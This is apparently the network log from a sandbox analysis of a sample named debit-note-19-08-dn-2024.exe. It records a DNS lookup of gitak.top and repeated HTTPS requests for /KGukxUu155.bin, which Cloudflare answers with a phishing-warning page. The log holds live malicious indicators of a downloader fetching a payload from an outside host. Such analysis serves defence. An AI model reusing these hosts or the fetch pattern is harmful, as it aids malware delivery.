                              Aug 26, 2024 15:39:03.630518913 CEST44349856172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:03.630637884 CEST49856443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:03.630847931 CEST49856443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:03.630856037 CEST44349856172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:03.840470076 CEST44349856172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:03.840593100 CEST49856443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:03.840929985 CEST49856443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:03.840938091 CEST44349856172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:03.841048956 CEST49856443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:03.841056108 CEST44349856172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:04.092581034 CEST44349856172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:04.092705965 CEST44349856172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:04.092747927 CEST49856443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:04.092780113 CEST44349856172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:04.092853069 CEST44349856172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:04.092864990 CEST49856443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:04.092977047 CEST49856443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:04.092992067 CEST44349856172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:04.093003035 CEST49856443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:04.093028069 CEST44349856172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:04.093230963 CEST49856443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:04.093395948 CEST49856443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:04.093421936 CEST44349856172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:14.112541914 CEST49857443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:14.112572908 CEST44349857172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:14.112709999 CEST49857443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:14.112943888 CEST49857443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:14.112953901 CEST44349857172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:14.324450970 CEST44349857172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:14.324574947 CEST49857443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:14.325057030 CEST49857443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:14.325068951 CEST44349857172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:14.325189114 CEST49857443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:14.325200081 CEST44349857172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:14.577018023 CEST44349857172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:14.577220917 CEST49857443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:14.577269077 CEST44349857172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:14.577301979 CEST44349857172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:14.577440023 CEST49857443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:14.577440023 CEST49857443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:14.577522993 CEST44349857172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:14.577670097 CEST49857443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:14.577702045 CEST44349857172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:14.577887058 CEST49857443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:14.577907085 CEST44349857172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:14.578032970 CEST49857443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:14.578083992 CEST49857443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:14.578140974 CEST44349857172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:24.610229969 CEST49858443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:24.610255003 CEST44349858172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:24.610470057 CEST49858443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:24.610656977 CEST49858443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:24.610665083 CEST44349858172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:24.819818974 CEST44349858172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:24.820019960 CEST49858443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:24.820360899 CEST49858443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:24.820365906 CEST44349858172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:24.820533037 CEST49858443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:24.820538998 CEST44349858172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:25.088606119 CEST44349858172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:25.088648081 CEST44349858172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:25.088685036 CEST44349858172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:25.088768959 CEST44349858172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:25.088803053 CEST49858443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:25.088812113 CEST44349858172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:25.088850975 CEST49858443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:25.088933945 CEST49858443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:25.091528893 CEST44349858172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:25.091567993 CEST44349858172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:25.091701984 CEST49858443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:25.091753960 CEST49858443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:25.091753960 CEST49858443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:25.091763973 CEST44349858172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:25.091856956 CEST49858443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:35.108133078 CEST49859443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:35.108171940 CEST44349859172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:35.108347893 CEST49859443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:35.108571053 CEST49859443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:35.108587980 CEST44349859172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:35.320486069 CEST44349859172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:35.320568085 CEST49859443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:35.320904970 CEST49859443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:35.320911884 CEST44349859172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:35.321011066 CEST49859443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:35.321013927 CEST44349859172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:35.568538904 CEST44349859172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:35.568588972 CEST44349859172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:35.568636894 CEST44349859172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:35.568658113 CEST44349859172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:35.568720102 CEST49859443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:35.568736076 CEST44349859172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:35.568744898 CEST44349859172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:35.568861961 CEST49859443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:35.568921089 CEST49859443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:35.569014072 CEST49859443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:35.569036007 CEST44349859172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:45.590059042 CEST49860443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:45.590095043 CEST44349860172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:45.590260983 CEST49860443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:45.590436935 CEST49860443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:45.590447903 CEST44349860172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:45.801971912 CEST44349860172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:45.802196980 CEST49860443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:45.802535057 CEST49860443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:45.802550077 CEST44349860172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:45.802669048 CEST49860443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:45.802680016 CEST44349860172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:46.050287962 CEST44349860172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:46.050322056 CEST44349860172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:46.050446033 CEST44349860172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:46.050471067 CEST49860443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:46.050471067 CEST49860443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:46.050478935 CEST44349860172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:46.050487041 CEST44349860172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:46.050719023 CEST49860443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:46.050726891 CEST44349860172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:46.050734997 CEST44349860172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:46.051098108 CEST49860443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:46.051098108 CEST49860443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:46.354495049 CEST49860443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:46.354535103 CEST44349860172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:56.073416948 CEST49861443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:56.073440075 CEST44349861172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:56.073612928 CEST49861443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:56.074012041 CEST49861443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:56.074019909 CEST44349861172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:56.286801100 CEST44349861172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:56.287040949 CEST49861443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:56.287314892 CEST49861443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:56.287338018 CEST44349861172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:56.287420034 CEST49861443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:56.287441969 CEST44349861172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:56.534035921 CEST44349861172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:56.534116030 CEST44349861172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:56.534221888 CEST49861443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:56.534235001 CEST44349861172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:56.534322023 CEST49861443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:56.534322977 CEST44349861172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:56.534390926 CEST49861443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:56.534400940 CEST44349861172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:56.534440041 CEST44349861172.67.207.219192.168.11.20
                              Aug 26, 2024 15:39:56.534475088 CEST49861443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:56.534573078 CEST49861443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:56.534737110 CEST49861443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:39:56.534745932 CEST44349861172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:06.554431915 CEST49862443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:06.554454088 CEST44349862172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:06.554626942 CEST49862443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:06.554811001 CEST49862443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:06.554816961 CEST44349862172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:06.766609907 CEST44349862172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:06.766737938 CEST49862443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:06.767076969 CEST49862443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:06.767081976 CEST44349862172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:06.767222881 CEST49862443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:06.767230988 CEST44349862172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:07.011872053 CEST44349862172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:07.011897087 CEST44349862172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:07.012006044 CEST44349862172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:07.012031078 CEST49862443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:07.012042046 CEST44349862172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:07.012115955 CEST44349862172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:07.012121916 CEST49862443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:07.012212038 CEST49862443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:07.012403965 CEST49862443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:07.012403965 CEST49862443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:07.318797112 CEST49862443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:07.318816900 CEST44349862172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:17.037205935 CEST49863443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:17.037270069 CEST44349863172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:17.037518024 CEST49863443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:17.037827015 CEST49863443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:17.037862062 CEST44349863172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:17.253273010 CEST44349863172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:17.253395081 CEST49863443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:17.253696918 CEST49863443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:17.253701925 CEST44349863172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:17.253824949 CEST49863443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:17.253829956 CEST44349863172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:17.503278017 CEST44349863172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:17.503346920 CEST44349863172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:17.503457069 CEST49863443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:17.503467083 CEST44349863172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:17.503475904 CEST44349863172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:17.503506899 CEST49863443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:17.503612995 CEST49863443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:17.503619909 CEST44349863172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:17.503761053 CEST49863443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:17.506861925 CEST44349863172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:17.506928921 CEST44349863172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:17.506978035 CEST49863443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:17.507031918 CEST49863443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:17.507038116 CEST44349863172.67.207.219192.168.11.20
                              Aug 26, 2024 15:40:17.507081032 CEST49863443192.168.11.20172.67.207.219
                              Aug 26, 2024 15:40:17.507178068 CEST49863443192.168.11.20172.67.207.219
                              TimestampSource PortDest PortSource IPDest IP
                              Aug 26, 2024 15:32:13.301465034 CEST5045353192.168.11.201.1.1.1
                              Aug 26, 2024 15:32:13.411161900 CEST53504531.1.1.1192.168.11.20
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Aug 26, 2024 15:32:13.301465034 CEST192.168.11.201.1.1.10xf248Standard query (0)gitak.topA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Aug 26, 2024 15:32:13.411161900 CEST1.1.1.1192.168.11.200xf248No error (0)gitak.top172.67.207.219A (IP address)IN (0x0001)false
                              Aug 26, 2024 15:32:13.411161900 CEST1.1.1.1192.168.11.200xf248No error (0)gitak.top104.21.22.240A (IP address)IN (0x0001)false
                              • gitak.top
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.11.2049817172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:32:13 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:32:13 UTC539INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:32:13 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NgEhfWjdjolm1FJXrloz1DZi79zCpnH9fTlsevcj0h82A9JUxHBK8pXkQgcAHqzn1qTdJ%2FN%2FXv8XMbj0ToEAl2sUHsdl%2FmX0zV0AhBCS08NpeLG7w9AWBU3KrI%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b942fca7fd51fce-IAD
                              2024-08-26 13:32:13 UTC830INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:32:13 UTC1369INData Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a
                              Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
                              2024-08-26 13:32:13 UTC1369INData Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 70 65 65 78 78 70 4d 74 45 69 59 39 76 49 6b 44 72 57 76 53 50 7a 6d 6a 78 65 47 4e 5f 43 71 7a 58 45 38 4b 77 31 6a 53 55 71 49 2d 31 37 32 34 36 37 39 31 33 33 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79
                              Data Ascii: <input type="hidden" name="atok" value="peexxpMtEiY9vIkDrWvSPzmjxeGN_CqzXE8Kw1jSUqI-1724679133-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
                              2024-08-26 13:32:13 UTC850INData Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f
                              Data Ascii: sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
                              2024-08-26 13:32:13 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.11.2049818172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:32:24 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:32:24 UTC541INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:32:24 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HP1l20aBthmst0OIwCltFk%2FqGqRtArstkZS9948E10fXjBbSEjNSMOKdNkyEBC%2FCY8p8a5ssDsYxCKdk3QB2fcKN%2BbVQU4M7Mm6uVFyyXHe1Vfh2P%2FKDq4KaEqE%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b94300c283e9c52-IAD
                              2024-08-26 13:32:24 UTC828INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:32:24 UTC1369INData Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29
                              Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
